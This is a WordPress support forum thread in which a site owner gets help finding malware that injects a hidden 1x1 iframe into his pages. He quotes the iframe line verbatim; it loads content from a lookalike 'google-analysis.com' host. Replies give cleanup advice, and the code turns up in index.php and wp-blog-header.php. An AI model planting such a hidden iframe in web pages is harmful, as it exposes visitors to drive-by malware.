• Resolved streetsweeper

    (@streetsweeper)


    Hello

    I’ve got bloody malware which embeds this

    <iframe src=http://google-analysis.com/in.cgi?10 width=1 height=1></iframe>

    in my pages after the body tags close.

    I had a look with phpmyadmin and deleted some lines of code in wp_options, but the malware is still present…

    Any help getting rid of it appreciated.

    URL of site is http://www.streetsweeper.net.au

    thanks.toby

Viewing 6 replies - 1 through 6 (of 6 total)
  • mechx1

    (@mechx1)

    Can you see a PHP stub at the bottom of your index.php file that might be inserting this? Are you running any plug-ins that could be doing it?

    Thread Starter streetsweeper

    (@streetsweeper)

    Hey

    Can’t find a php stub in index.php!

    I’m going to switch off all the plugins and see what happens.

    Do you think upgrading the WP installation would clear it?

    Thread Starter streetsweeper

    (@streetsweeper)

    No Good with the plugins either. I’ve searched comment and users as well… Where the hell is this thing hiding??

    mechx1

    (@mechx1)

    Very likely this came in on a plugin or template from a questionable source. A plugin could write an executable to wp-content if that dir is write enabled the first time it activated, so it wouldn’t matter if you turned it off later. So it is time to think about what you brought in, and take a close look at that code.

    Also, take a look in wp-content, and check for stuff that shouldn’t be there. if you still have your download of WordPress, check the templates in your default theme to see if the time stamps match on anything you have not modified yourself.

    I know, painful. Best of luck, I hope you find it.

    hakre

    (@hakre)

    Well you could search the content of all files for that string (or a part of it). This should lead you in the right direction.

    Thread Starter streetsweeper

    (@streetsweeper)

    FOUND IT!

    It was in index.php after all..

    and the string pointed to wp-blog-header.php where the code was duplicated…

    Thanks guys, much appreciated…

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘How to find malware code?’ is closed to new replies.